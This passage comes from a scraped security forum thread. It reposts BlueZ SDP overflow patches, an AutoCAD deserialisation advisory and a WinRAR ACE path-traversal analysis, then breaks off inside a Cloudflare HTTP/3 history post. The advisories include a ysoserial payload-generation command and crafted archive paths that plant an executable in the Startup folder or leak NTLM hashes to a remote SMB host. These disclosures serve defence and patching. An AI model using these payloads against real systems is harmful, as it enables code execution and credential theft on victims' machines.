buf, max_rsp_size); + if (!cstate_size) { status = SDP_INVALID_CSTATE; error("NULL cache buffer and non-NULL continuation state"); } @@ -786,7 +801,7 @@ done: static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf) { int status = 0, plen, totscanned; - uint8_t *pdata, *pResponse = NULL; + uint8_t *pdata; unsigned int max; int scanned, rsp_count = 0; sdp_list_t *pattern = NULL, *seq = NULL, *svcList; @@ -915,19 +930,8 @@ static int service_search_attr_req(sdp_req_t *req, sdp_buf_t *buf) } else cstate_size = sdp_set_cstate_pdu(buf, NULL); } else { - /* continuation State exists -> get from cache */ - sdp_buf_t *pCache = sdp_get_cached_rsp(cstate); - if (pCache && cstate->cStateValue.maxBytesSent < pCache->data_size) { - uint16_t sent = MIN(max, pCache->data_size - cstate->cStateValue.maxBytesSent); - pResponse = pCache->data; - memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent); - buf->data_size += sent; - cstate->cStateValue.maxBytesSent += sent; - if (cstate->cStateValue.maxBytesSent == pCache->data_size) - cstate_size = sdp_set_cstate_pdu(buf, NULL); - else - cstate_size = sdp_set_cstate_pdu(buf, cstate); - } else { + cstate_size = sdp_cstate_rsp(cstate, buf, max); + if (!cstate_size) { status = SDP_INVALID_CSTATE; SDPDBG("Non-null continuation state, but null cache buffer"); } -- 2.17.1 SDP Heap Overflow patch: From 6632f256515ed4bd603a8ccb3b8bdd84fd5cc181 Mon Sep 17 00:00:00 2001 From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> Date: Fri, 28 Sep 2018 16:08:32 +0300 Subject: [PATCH BlueZ 2/2] sdp: Fix buffer overflow MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit sdp_append_buf shall check if there is enough space to store the data before copying it. An independent security researcher, Julian Rauchberger, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. --- lib/sdp.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/lib/sdp.c b/lib/sdp.c index eb408a948..84311eda1 100644 --- a/lib/sdp.c +++ b/lib/sdp.c @@ -2834,6 +2834,12 @@ void sdp_append_to_buf(sdp_buf_t *dst, uint8_t *data, uint32_t len) SDPDBG("Append src size: %d", len); SDPDBG("Append dst size: %d", dst->data_size); SDPDBG("Dst buffer size: %d", dst->buf_size); + + if (dst->data_size + len > dst->buf_size) { + SDPERR("Cannot append"); + return; + } + if (dst->data_size == 0 && dtd == 0) { /* create initial sequence */ *p = SDP_SEQ8; -- 2.17.1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 From 6632f256515ed4bd603a8ccb3b8bdd84fd5cc181 Mon Sep 17 00:00:00 2001 From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com> Date: Fri, 28 Sep 2018 16:08:32 +0300 Subject: [PATCH BlueZ 2/2] sdp: Fix buffer overflow MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit sdp_append_buf shall check if there is enough space to store the data before copying it. An independent security researcher, Julian Rauchberger, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. --- lib/sdp.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/lib/sdp.c b/lib/sdp.c index eb408a948..84311eda1 100644 --- a/lib/sdp.c +++ b/lib/sdp.c @@ -2834,6 +2834,12 @@ void sdp_append_to_buf(sdp_buf_t *dst, uint8_t *data, uint32_t len) SDPDBG("Append src size: %d", len); SDPDBG("Append dst size: %d", dst->data_size); SDPDBG("Dst buffer size: %d", dst->buf_size); + + if (dst->data_size + len > dst->buf_size) { + SDPERR("Cannot append"); + return; + } + if (dst->data_size == 0 && dtd == 0) { /* create initial sequence */ *p = SDP_SEQ8; -- 2.17.1 Sursa: https://ssd-disclosure.com/index.php/archives/3743
      • 1
      • Upvote
  11. AutoCad .NET Deserialisation Vulnerability Product AutoCad Severity Medium CVE Reference CVE-2019-7361 Type Code Execution Description The Action Macro functionality of AutoDesk’s AutoCad software suite is vulnerable to code execution due to improper validation of user input passed to a deserialization call. AutoCad provides the ability to automate a set of tasks by recording the user performing those tasks and replaying them later. This functionality is called Action Macros. Before playing an Action Macro, the list of actions performed are presented to the user, as shown in the next figure. This recording will create a number of “DONUT” objects within the current drawing. Once an Action Macro has been recorded, it is saved to the user’s “Actions” directory as a .actm file. A snippet of the underlying data of the Action Macro file for the above recording is shown below: This data is made up of a number of .NET serialized objects. Highlighted in red is the length of the first object (of type AutoDesk.AutoCad.MacroRecorder.MacroNode). The green outline highlights the actual object, and the blue is the beginning of the next object. It should be noted that this data is deserialized to allow the user to view the tree of actions within a recording prior to the user clicking “play”. The vulnerability ultimately lies in AcMR.dll, specifically the method AutoDesk.AutoCad.MacroRecorder.BaseNode.Load: public static INode Load(Stream stream) { if (!DebugUtil.Verify(stream != null)) return (INode) null; object obj = MacroManager.Formatter.Deserialize(stream); (2) if (DebugUtil.Verify(obj is INode)) (3) return obj as INode; return (INode) null; } public void Save(Stream stream) { if (!DebugUtil.Verify(stream != null)) return; MacroManager.Formatter.Serialize(stream, (object) this); (1) } At (1) the object is saved using MacroManager.Formatter’s Serialize method – this occurs when an Action Macro is saved. At (2), the user input stream is Deserialized prior to being checked as a valid Inode object at (3). These actions occur when the Action Macro is loaded into memory. The MacroManager.Formatter.Deserialize method is a wrapper to the .NET BinaryFormatter function: public static IFormatter Formatter { get { if (MacroManager.m_formatter == null) { MacroManager.m_formatter = (IFormatter) new BinaryFormatter(); MacroManager.m_formatter.Binder = (SerializationBinder) new MacroManager.TypeRedirectionBinder(); } return MacroManager.m_formatter; } } A malicious user is able to gain code execution by replacing legitimate serialized objects in an Action Macro file. As a proof of concept, the ysoserial.net tool was used to generate a series of .NET gadgets that, when deserialised, would cause a calculator to be opened. The command used for this proof of concept was: ysoserial.exe -o raw -g TypeConfuseDelegate -c "calc.exe" -f BinaryFormatter > poc_calc_action_macro.actm Code execution occurs when a user attempts to view the actions within an Action Macro, this occurs directly prior to replaying it, as demonstrated in the next figure. Note that the Action Macro is never “played”. Impact This vulnerability is of medium risk to end users. Code execution occurs in the context of the current user, no extra privileges are gained. The potential attack vector could be through phishing of end users, whereby they are coerced into playing malicious Action Macros believing them to be legitimate. The most likely scenario could involve a malicious actor sharing an ActionMacro file online that supposedly solves a community problem. Solution As of February 1st 2019 AutoDesk have released a patch migitating this vulnerability. Users are advised to update AutoCad to the most recent version available. AutoDesk have also produced following advisory pertaining to this vulnerability as well as a number of others [2]. References [1] ysoserial.net - https://github.com/pwntester/ysoserial.net/tree/master/ysoserial [2] AutoDesk Advisory - https://www.autodesk.com/trust/security-advisories/adsk-sa-2019-0001 Sursa: https://labs.mwrinfosecurity.com/advisories/autocad-net-deserialisation-vulnerability/
      • 1
      • Upvote
  12. Investigating WinRAR Code Execution Vulnerability (CVE-2018-20250) at Internet Scale Author adminPosted on February 22, 2019Categories Papers Authors: lywang, dannywei 0x00 Background As one of the most popular archiving software, WinRAR supports compress and decompress of multiple file archive formats. Check Point security researcher Nadav Grossman recently discovered a series of security vulnerabilities he found in WinRAR, with most powerful one being a remote code execution vulnerability in ACE archive decompression module (CVE-2018-20250). To support decompression of ACE archives, WinRAR integrated a 19-year-old dynamic link library unacev2.dll, which never updated since 2006, nor does it enable any kind of exploit mitigation technologies. Nadav Grossman uncovered a dictionary traversal bug in unacev2.dll, which could allow an attacker to execute arbitrary code or leak Net-NTLM hashes. 0x01 Description ACE archive decompression module unacev2.dll fails to properly filter relative paths when validating target path. Attacker can trick the program to directly use a relative path as target path. By placing malicious executable in system startup folder, it can lead to arbitrary code execution. 0x02 Root Cause unacev2.dll validates destination path before extracting files from ACE archives. It gets file_relative_path from archive file and use GetDevicePathLen(file_relative_path) to validate the path. The path concatenation is performed according to return value of the function, as shown in following diagram: (Source: https://research.checkpoint.com/extracting-code-execution-from-winrar/) When GetDevicePathLen(file_relative_path) returns 0, it will concatenate target path with relative path in archive to form a final path: sprintf(final_file_path, "%s%s", destination_folder, file_relative_path); Otherwise, it directly uses relative path as the final path: sprintf(final_file_path, "%s%s", "", file_relative_path); if an attacker can craft a malicious relative path that can bypass multiple filter and validation functions such as StateCallbackProc(), unacev2.dll!CleanPath(), and make unacev2.dll!GetDevicePathLen(file_relative_path) return a non-zero value, the malicious relative path will be used as final path for decompression. Nadav Grossman successfully crafted two such paths: # Malicious Path Final Path 1 C:\C:\some_folder\some_file.ext C:\some_folder\some_file.ext 2 C:\\10.10.10.10\smb_folder_name\some_folder\some_file.ext \10.10.10.10\smb_folder_name\some_folder\some_file.ext Variation 1: Attacker can place a file at arbitrary path on victim’s computer. Variation 2: Attacker can steal victim’s Net-NTLM hash. Attacker can then perform a NTLM relay attack to execute code on victim’s computer. It is worth mentioning that WinRAR runs at normal user privilege. Therefore, an attacker cannot place a file in the common startup folder (“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”). Placing a file in user startup folder (“C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”) requires guessing or brute-forcing a valid user name. However, in most common scenarios, where victims download archive file to Desktop (C:\Users\<user name>\Desktop) or Downloads (C:\Users\<user name>\Downloads) folder then extract the archive file in-place, the working directory of WinRAR is the same as the archive file. By using directory traversal, attacker can release payload to Startup folder without guessing a user name. Nadav Grossman crafted the following path to build a remote code execution exploit: "C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe" 0x03 Affected Software As a shared library, unacev2.dll is also used by other software that supports ACE file decompression. These software are also affected by this vulnerability. Our Project A’Tuin system scans software at internet scale. We scanned through all software that used this shared library. The following diagram shows the version distribution of this library: Project A’Tuin can also traces shared libraries back to their dependent software. We currently observe that 15 Chinese software and 24 non-Chinese software are affected. Most of them can be categorized as utility software. Among them there are at least 9 file archivers, and 8 file explorer / commanders. Many other software seems to simply include unacev2.dll module as part of WinRAR package, for its own file decompression usage. 0x04 Mitigations WinRAR released version 5.70 Beta 1 to patch this vulnerability. Since the vendor of unacev2.dll was out of business in August 2017 and it is a closed source product, WinRAR decided to remove ACE decompression feature from WinRAR entirely. 360Zip has also patched this vulnerability by removing unacev2.dll. For users of other affected products, we suggest contacting the vendor for updated versions. If no updated version is available, users can temporarily work around this vulnerability by removing unacev2.dll from installation directory. 0x05 References [1] Extracting a 19 Year Old Code Execution from WinRAR https://research.checkpoint.com/extracting-code-execution-from-winrar/ [2] ACE (compressed file format) https://en.wikipedia.org/wiki/ACE_(compressed_file_format) Sursa: https://xlab.tencent.com/en/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/
  13. HTTP/3: From root to tip 24 Jan 2019 by Lucas Pardue. HTTP is the application protocol that powers the Web. It began life as the so-called HTTP/0.9 protocol in 1991, and by 1999 had evolved to HTTP/1.1, which was standardised within the IETF (Internet Engineering Task Force). HTTP/1.1 was good enough for a long time but the ever changing needs of the Web called for a better suited protocol, and HTTP/2 emerged in 2015. More recently it was announced that the IETF is intending to deliver a new version - HTTP/3. To some people this is a surprise and has caused a bit of confusion. If you don't track IETF work closely it might seem that HTTP/3 has come out of the blue. However, we can trace its origins through a lineage of experiments and evolution of Web protocols; specifically the QUIC transport protocol. If you're not familiar with QUIC, my colleagues have done a great job of tackling different angles. John's blog describes some of the real-world annoyances of today's HTTP, Alessandro's blog tackles the nitty-gritty transport layer details, and Nick's blog covers how to get hands on with some testing. We've collected these and more at https://cloudflare-quic.com. And if that tickles your fancy, be sure to check out quiche, our own open-source implementation of the QUIC protocol written in Rust. HTTP/3 is the HTTP application mapping to the QUIC transport layer. This name was made official in the recent draft version 17 (draft-ietf-quic-http-17), which was proposed in late October 2018, with discussion and rough consensus being formed during the IETF 103 meeting in Bangkok in November. HTTP/3 was previously known as HTTP over QUIC, which itself was previously known as HTTP/2 over QUIC. Before that we had HTTP/2 over gQUIC, and way back we had SPDY over gQUIC. The fact of the matter, however, is that HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. In this blog post we'll explore the history behind some of HTTP/3's previous names and present the motivation behind the most recent name change. We'll go back to the early days of HTTP and touch on all the good work that has happened along the way. If you're keen to get the full picture you can jump to the end of the article or open this highly detailed SVG version. An HTTP/3 layer cake Setting the scene Just before we focus on HTTP, it is worth reminding ourselves that there are two protocols that share the name QUIC. As we explained previously, gQUIC is commonly used to identify Google QUIC (the original protocol), and QUIC is commonly used to represent the IETF standard-in-progress version that diverges from gQUIC. Since its early days in the 90s, the web’s needs have changed. We've had new versions of HTTP and added user security in the shape of Transport Layer Security (TLS). We'll only touch on TLS in this post, our other blog posts are a great resource if you want to explore that area in more detail. To help me explain the history of HTTP and TLS, I started to collate details of protocol specifications and dates. This information is usually presented in a textual form such as a list of bullets points stating document titles, ordered by date. However, there are branching standards, each overlapping in time and a simple list cannot express the real complexity of relationships. In HTTP, there has been parallel work that refactors core protocol definitions for easier consumption, extends the protocol for new uses, and redefines how the protocol exchanges data over the Internet for performance. When you're trying to join the dots over nearly 30 years of Internet history across different branching work streams you need a visualisation. So I made one - the Cloudflare Secure Web Timeline. (NB: Technically it is a Cladogram, but the term timeline is more widely known). I have applied some artistic license when creating this, choosing to focus on the successful branches in the IETF space. Some of the things not shown include efforts in the W3 Consortium HTTP-NG working group, along with some exotic ideas that their authors are keen on explaining how to pronounce: HMURR (pronounced 'hammer') and WAKA (pronounced “wah-kah”). In the next few sections I'll walk this timeline to explain critical chapters in the history of HTTP. To enjoy the takeaways from this post, it helps to have an appreciation of why standardisation is beneficial, and how the IETF approaches it. Therefore we'll start with a very brief overview of that topic before returning to the timeline itself. Feel free to skip the next section if you are already familiar with the IETF. Types of Internet standard Generally, standards define common terms of reference, scope, constraint, applicability, and other considerations. Standards exist in many shapes and sizes, and can be informal (aka de facto) or formal (agreed/published by a Standards Defining Organisation such as IETF, ISO or MPEG). Standards are used in many fields, there is even a formal British Standard for making tea - BS 6008. The early Web used HTTP and SSL protocol definitions that were published outside the IETF, these are marked as red lines on the Secure Web Timeline. The uptake of these protocols by clients and servers made them de facto standards. At some point, it was decided to formalise these protocols (some motivating reasons are described in a later section). Internet standards are commonly defined in the IETF, which is guided by the informal principle of "rough consensus and running code". This is grounded in experience of developing and deploying things on the Internet. This is in contrast to a "clean room" approach of trying to develop perfect protocols in a vacuum. IETF Internet standards are commonly known as RFCs. This is a complex area to explain so I recommend reading the blog post "How to Read an RFC" by the QUIC Working Group Co-chair Mark Nottingham. A Working Group, or WG, is more or less just a mailing list. Each year the IETF hold three meetings that provide the time and facilities for all WGs to meet in person if they wish. The agenda for these weeks can become very congested, with limited time available to discuss highly technical areas in depth. To overcome this, some WGs choose to also hold interim meetings in the months between the the general IETF meetings. This can help to maintain momentum on specification development. The QUIC WG has held several interim meetings since 2017, a full list is available on their meeting page. These IETF meetings also provide the opportunity for other IETF-related collections of people to meet, such as the Internet Architecture Board or Internet Research Task Force. In recent years, an IETF Hackathon has been held during the weekend preceding the IETF meeting. This provides an opportunity for the community to develop running code and, importantly, to carry out interoperability testing in the same room with others. This helps to find issues in specifications that can be discussed in the following days. For the purposes of this blog, the important thing to understand is that RFCs don't just spring into existence. Instead, they go through a process that usually starts with an IETF Internet Draft (I-D) format that is submitted for consideration of adoption. In the case where there is already a published specification, preparation of an I-D might just be a simple reformatting exercise. I-Ds have a 6 month active lifetime from the date of publish. To keep them active, new versions need to be published. In practice, there is not much consequence to letting an I-D elapse and it happens quite often. The documents continue to be hosted on the IETF document’s website for anyone that wants to read them. I-Ds are represented on the Secure Web Timeline as purple lines. Each one has a unique name that takes the form of draft-{author name}-{working group}-{topic}-{version}. The working group field is optional, it might predict IETF WG that will work on the piece and sometimes this changes. If an I-D is adopted by the IETF, or if the I-D was initiated directly within the IETF, the name is draft-ietf-{working group}-{topic}-{version}. I-Ds may branch, merge or die on the vine. The version starts at 00 and increases by 1 each time a new draft is released. For example, the 4th draft of an I-D will have the version 03. Any time that an I-D changes name, its version resets back to 00. It is important to note that anyone can submit an I-D to the IETF; you should not consider these as standards. But, if the IETF standardisation process of an I-D does reach consensus, and the final document passes review, we finally get an RFC. The name changes again at this stage. Each RFC gets a unique number e.g. RFC 7230. These are represented as blue lines on the Secure Web Timeline. RFCs are immutable documents. This means that changes to the RFC require a completely new number. Changes might be done in order to incorporate fixes for errata (editorial or technical errors that were found and reported) or simply to refactor the specification to improve layout. RFCs may obsolete older versions (complete replacement), or just update them (substantively change). All IETF documents are openly available on http://tools.ietf.org. Personally I find the IETF Datatracker a little more user friendly because it provides a visualisation of a documents progress from I-D to RFC. Below is an example that shows the development of RFC 1945 - HTTP/1.0 and it is a clear source of inspiration for the Secure Web Timeline. IETF Datatracker view of RFC 1945 Interestingly, in the course of my work I found that the above visualisation is incorrect. It is missing draft-ietf-http-v10-spec-05 for some reason. Since the I-D lifetime is 6 months, there appears to be a gap before it became an RFC, whereas in reality draft 05 was still active through until August 1996. Exploring the Secure Web Timeline With a small appreciation of how Internet standards documents come to fruition, we can start to walk the the Secure Web Timeline. In this section are a number of excerpt diagrams that show an important part of the timeline. Each dot represents the date that a document or capability was made available. For IETF documents, draft numbers are omitted for clarity. However, if you want to see all that detail please check out the complete timeline. HTTP began life as the so-called HTTP/0.9 protocol in 1991, and in 1994 the I-D draft-fielding-http-spec-00 was published. This was adopted by the IETF soon after, causing the name change to draft-ietf-http-v10-spec-00. The I-D went through 6 draft versions before being published as RFC 1945 - HTTP/1.0 in 1996. However, even before the HTTP/1.0 work completed, a separate activity started on HTTP/1.1. The I-D draft-ietf-http-v11-spec-00 was published in November 1995 and was formally published as RFC 2068 in 1997. The keen eyed will spot that the Secure Web Timeline doesn't quite capture that sequence of events, this is an unfortunate side effect of the tooling used to generate the visualisation. I tried to minimise such problems where possible. An HTTP/1.1 revision exercise was started in mid-1997 in the form of draft-ietf-http-v11-spec-rev-00. This completed in 1999 with the publication of RFC 2616. Things went quiet in the IETF HTTP world until 2007. We'll come back to that shortly. A History of SSL and TLS Switching tracks to SSL. We see that the SSL 2.0 specification was released sometime around 1995, and that SSL 3.0 was released in November 1996. Interestingly, SSL 3.0 is described by RFC 6101, which was released in August 2011. This sits in Historic category, which "is usually done to document ideas that were considered and discarded, or protocols that were already historic when it was decided to document them." according to the IETF. In this case it is advantageous to have an IETF-owned document that describes SSL 3.0 because it can be used as a canonical reference elsewhere. Of more interest to us is how SSL inspired the development of TLS, which began life as draft-ietf-tls-protocol-00 in November 1996. This went through 6 draft versions and was published as RFC 2246 - TLS 1.0 at the start of 1999. Between 1995 and 1999, the SSL and TLS protocols were used to secure HTTP communications on the Internet. This worked just fine as a de facto standard. It wasn't until January 1998 that the formal standardisation process for HTTPS was started with the publication of I-D draft-ietf-tls-https-00. That work concluded in May 2000 with the publication of RFC 2616 - HTTP over TLS. TLS continued to evolve between 2000 and 2007, with the standardisation of TLS 1.1 and 1.2. There was a gap of 7 years until work began on the next version of TLS, which was adopted as draft-ietf-tls-tls13-00 in April 2014 and, after 28 drafts, completed as RFC 8446 - TLS 1.3 in August 2018. Internet standardisation process After taking a small look at the timeline, I hope you can build a sense of how the IETF works. One generalisation for the way that Internet standards take shape is that researchers or engineers design experimental protocols that suit their specific use case. They experiment with protocols, in public or private, at various levels of scale. The data helps to identify improvements or issues. The work may be published to explain the experiment, to gather wider input or to help find other implementers. Take up of this early work by others may make it a de facto standard; eventually there may be sufficient momentum that formal standardisation becomes an option. The status of a protocol can be an important consideration for organisations that may be thinking about implementing, deploying or in some way using it. A formal standardisation process can make a de facto standard more attractive because it tends to provide stability. The stewardship and guidance is provided by an organisation, such as the IETF, that reflects a wider range of experiences. However, it is worth highlighting that not all all formal standards succeed. The process of creating a final standard is almost as important as the standard itself. Taking an initial idea and inviting contribution from people with wider knowledge, experience and use cases can to help produce something that will be of more use to a wider population. However, the standardisation process is not always easy. There are pitfalls and hurdles. Sometimes the process takes so long that the output is no longer relevant. Each Standards Defining Organisation tends to have its own process that is geared around its field and participants. Explaining all of the details about how the IETF works is well beyond the scope of this blog. The IETF's "How we work" page is an excellent starting point that covers many aspects. The best method to forming understanding, as usual, is to get involved yourself. This can be as easy as joining an email list or adding to discussion on a relevant GitHub repository. Cloudflare's running code Cloudflare is proud to be early an adopter of new and evolving protocols. We have a long record of adopting new standards early, such as HTTP/2. We also test features that are experimental or yet to be final, like TLS 1.3 and SPDY. In relation to the IETF standardisation process, deploying this running code on real networks across a diverse body of websites helps us understand how well the protocol will work in practice. We combine our existing expertise with experimental information to help improve the running code and, where it makes sense, feedback issues or improvements to the WG that is standardising a protocol. Testing new things is not the only priority. Part of being an innovator is knowing when it is time to move forward and put older innovations in the rear view mirror. Sometimes this relates to security-oriented protocols, for example, Cloudflare disabled SSLv3 by default due of the POODLE vulnerability. In other cases, protocols become superseded by a more technologically advanced one; Cloudflare deprecated SPDY support in favour of HTTP/2. The introduction and deprecation of relevant protocols are represented on the Secure Web Timeline as orange lines. Dotted vertical lines help correlate Cloudflare events to relevant IETF documents. For example, Cloudflare introduced TLS 1.3 support in September 2016, with the final document, RFC 8446, being published almost two years later in August 2018. Refactoring in HTTPbis HTTP/1.1 is a very successful protocol and the timeline shows that there wasn't much activity in the IETF after 1999. However, the true reflection is that years of active use gave implementation experience that unearthed latent issues with RFC 2616, which caused some interoperability issues. Furthermore, the protocol was extended by other RFCs like 2817 and 2818. It was decided in 2007 to kickstart a new activity to improve the HTTP protocol specification. This was called HTTPbis (where "bis" stems from Latin meaning "two", "twice" or "repeat") and it took the form of a new Working Group. The original charter does a good job of describing the problems that were trying to be solved. In short, HTTPbis decided to refactor RFC 2616. It would incorporate errata fixes and buy in some aspects of other specifications that had been published in the meantime. It was decided to split the document up into parts. This resulted in 6 I-Ds published in December 2007: draft-ietf-httpbis-p1-messaging draft-ietf-httpbis-p2-semantics draft-ietf-httpbis-p4-conditional draft-ietf-httpbis-p5-range draft-ietf-httpbis-p6-cache draft-ietf-httpbis-p7-auth The diagram shows how this work progressed through a lengthy drafting process of 7 years, with 27 draft versions being released, before final standardisation. In June 2014, the so-called RFC 723x series was released (where x ranges from 0 to 5). The Chair of the HTTPbis WG celebrated this achievement with the acclimation "RFC2616 is Dead". If it wasn't clear, these new documents obsoleted the older RFC 2616. What does any of this have to do with HTTP/3? While the IETF was busy working on the RFC 723x series the world didn't stop. People continued to enhance, extend and experiment with HTTP on the Internet. Among them were Google, who had started to experiment with something called SPDY (pronounced speedy). This protocol was touted as improving the performance of web browsing, a principle use case for HTTP. At the end of 2009 SPDY v1 was announced, and it was quickly followed by SPDY v2 in 2010. I want to avoid going into the technical details of SPDY. That's a topic for another day. What is important, is to understand that SPDY took the core paradigms of HTTP and modified the interchange format slightly in order to gain improvements. With hindsight, we can see that HTTP has clearly delimited semantics and syntax. Semantics describe the concept of request and response exchanges including: methods, status codes, header fields (metadata) and bodies (payload). Syntax describe how to map semantics to bytes on the wire. HTTP/0.9, 1.0 and 1.1 share many semantics. They also share syntax in the form of character strings that are sent over TCP connections. SPDY took HTTP/1.1 semantics and changed the syntax from strings to binary. This is a really interesting topic but we will go no further down that rabbit hole today. Google's experiments with SPDY showed that there was promise in changing HTTP syntax, and value in keeping the existing HTTP semantics. For example, keeping the format of URLs to use https:// avoided many problems that could have affected adoption. Having seen some of the positive outcomes, the IETF decided it was time to consider what HTTP/2.0 might look like. The slides from the HTTPbis session held during IETF 83 in March 2012 show the requirements, goals and measures of success that were set out. It is also clearly states that "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". During that meeting the community was invited to share proposals. I-Ds that were submitted for consideration included draft-mbelshe-httpbis-spdy-00, draft-montenegro-httpbis-speed-mobility-00 and draft-tarreau-httpbis-network-friendly-00. Ultimately, the SPDY draft was adopted and in November 2012 work began on draft-ietf-httpbis-http2-00. After 18 drafts across a period of just over 2 years, RFC 7540 - HTTP/2 was published in 2015. During this specification period, the precise syntax of HTTP/2 diverged just enough to make HTTP/2 and SPDY incompatible. These years were a very busy period for the HTTP-related work at the IETF, with the HTTP/1.1 refactor and HTTP/2 standardisation taking place in parallel. This is in stark contrast to the many years of quiet in the early 2000s. Be sure to check out the full timeline to really appreciate the amount of work that took place. Although HTTP/2 was in the process of being standardised, there was still benefit to be had from using and experimenting with SPDY. Cloudflare introduced support for SPDY in August 2012 and only deprecated it in February 2018 when our statistics showed that less than 4% of Web clients continued to want SPDY. Meanwhile, we introduced HTTP/2 support in December 2015, not long after the RFC was published, when our analysis indicated that a meaningful proportion of Web clients could take advantage of it. Web client support of the SPDY and HTTP/2 protocols preferred the secure option of using TLS. The introduction of Universal SSL in September 2014 helped ensure that all websites signed up to Cloudflare were able to take advantage of these new protocols as we introduced them. gQUIC Google continued to experiment between 2012 and 2015 they released SPDY v3 and v3.1. They also started working on gQUIC (pronounced, at the time, as quick) and the initial public specification was made available in early 2012. The early versions of gQUIC made use of the SPDY v3 form of HTTP syntax. This choice made sense because HTTP/2 was not yet finished. The SPDY binary syntax was packaged into QUIC packets that could sent in UDP datagrams. This was a departure from the TCP transport that HTTP traditionally relied on. When stacked up all together this looked like: SPDY over gQUIC layer cake gQUIC used clever tricks to achieve performance. One of these was to break the clear layering between application and transport. What this meant in practice was that gQUIC only ever supported HTTP. So much so that gQUIC, termed "QUIC" at the time, was synonymous with being the next candidate version of HTTP. Despite the continued changes to QUIC over the last few years, which we'll touch on momentarily, to this day, the term QUIC is understood by people to mean that initial HTTP-only variant. Unfortunately this is a regular source of confusion when discussing the protocol. gQUIC continued to experiment and eventually switched over to a syntax much closer to HTTP/2. So close in fact that most people simply called it "HTTP/2 over QUIC". However, because of technical constraints there were some very subtle differences. One example relates to how the HTTP headers were serialized and exchanged. It is a minor difference but in effect means that HTTP/2 over gQUIC was incompatible with the IETF's HTTP/2. Last but not least, we always need to consider the security aspects of Internet protocols. gQUIC opted not to use TLS to provide security. Instead Google developed a different approach called QUIC Crypto. One of the interesting aspects of this was a new method for speeding up security handshakes. A client that had previously established a secure session with a server could reuse information to do a "zero round-trip time", or 0-RTT, handshake. 0-RTT was later incorporated into TLS 1.3. Are we at the point where you can tell me what HTTP/3 is yet? Almost. By now you should be familiar with how standardisation works and gQUIC is not much different. There was sufficient interest that the Google specifications were written up in I-D format. In June 2015 draft-tsvwg-quic-protocol-00, entitled "QUIC: A UDP-based Secure and Reliable Transport for HTTP/2" was submitted. Keep in mind my earlier statement that the syntax was almost-HTTP/2. Google announced that a Bar BoF would be held at IETF 93 in Prague. For those curious about what a "Bar BoF" is, please consult RFC 6771. Hint: BoF stands for Birds of a Feather. The outcome of this engagement with the IETF was, in a nutshell, that QUIC seemed to offer many advantages at the transport layer and that it should be decoupled from HTTP. The clear separation between layers should be re-introduced. Furthermore, there was a preference for returning back to a TLS-based handshake (which wasn't so bad since TLS 1.3 was underway at this stage, and it was incorporating 0-RTT handshakes). About a year later, in 2016, a new set of I-Ds were submitted: draft-hamilton-quic-transport-protocol-00 draft-thomson-quic-tls-00 draft-iyengar-quic-loss-recovery-00 draft-shade-quic-http2-mapping-00 Here's where another source of confusion about HTTP and QUIC enters the fray. draft-shade-quic-http2-mapping-00 is entitled "HTTP/2 Semantics Using The QUIC Transport Protocol" and it describes itself as "a mapping of HTTP/2 semantics over QUIC". However, this is a misnomer. HTTP/2 was about changing syntax while maintaining semantics. Furthermore, "HTTP/2 over gQUIC" was never an accurate description of the syntax either, for the reasons I outlined earlier. Hold that thought. This IETF version of QUIC was to be an entirely new transport protocol. That's a large undertaking and before diving head-first into such commitments, the IETF likes to gauge actual interest from its members. To do this, a formal Birds of a Feather meeting was held at the IETF 96 meeting in Berlin in 2016. I was lucky enough to attend the session in person and the slides don't give it justice. The meeting was attended by hundreds, as shown by Adam Roach's photograph. At the end of the session consensus was reached; QUIC would be adopted and standardised at the IETF. The first IETF QUIC I-D for mapping HTTP to QUIC, draft-ietf-quic-http-00, took the Ronseal approach and simplified its name to "HTTP over QUIC". Unfortunately, it didn't finish the job completely and there were many instances of the term HTTP/2 throughout the body. Mike Bishop, the I-Ds new editor, identified this and started to fix the HTTP/2 misnomer. In the 01 draft, the description changed to "a mapping of HTTP semantics over QUIC". Gradually, over time and versions, the use of the term "HTTP/2" decreased and the instances became mere references to parts of RFC 7540. Roll forward two years to October 2018 and the I-D is now at version 16. While HTTP over QUIC bares similarity to HTTP/2 it ultimately is an independent, non-backwards compatible HTTP syntax. However, to those that don't track IETF development very closely (a very very large percentage of the Earth's population), the document name doesn't capture this difference. One of the main points of standardisation is to aid communication and interoperability. Yet a simple thing like naming is a major contributor to confusion in the community. Recall what was said in 2012, "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". The IETF followed that existing cue. After much deliberation in the lead up to, and during, IETF 103, consensus was reached to rename "HTTP over QUIC" to HTTP/3. The world is now in a better place and we can move on to more important debates. But RFC 7230 and 7231 disagree with your definition of semantics and syntax! Sometimes document titles can be confusing. The present HTTP documents that describe syntax and semantics are: RFC 7230 - Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing RFC 7231 - Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content It is possible to read too much into these names and believe that fundamental HTTP semantics are specific for versions of HTTP i.e. HTTP/1.1. However, this is an unintended side effect of the HTTP family tree. The good news is that the HTTPbis Working Group are trying to address this. Some brave members are going through another round of document revision, as Roy Fielding put it, "one more time!". This work is underway right now and is known as the HTTP Core activity (you may also have heard of this under the moniker HTTPtre or HTTPter; naming things is hard). This will condense the six drafts down to three: HTTP Semantics (draft-ietf-httpbis-semantics) HTTP Caching (draft-ietf-httpbis-caching) HTTP/1.1 Message Syntax and Routing (draft-ietf-httpbis-messaging) Under this new structure, it 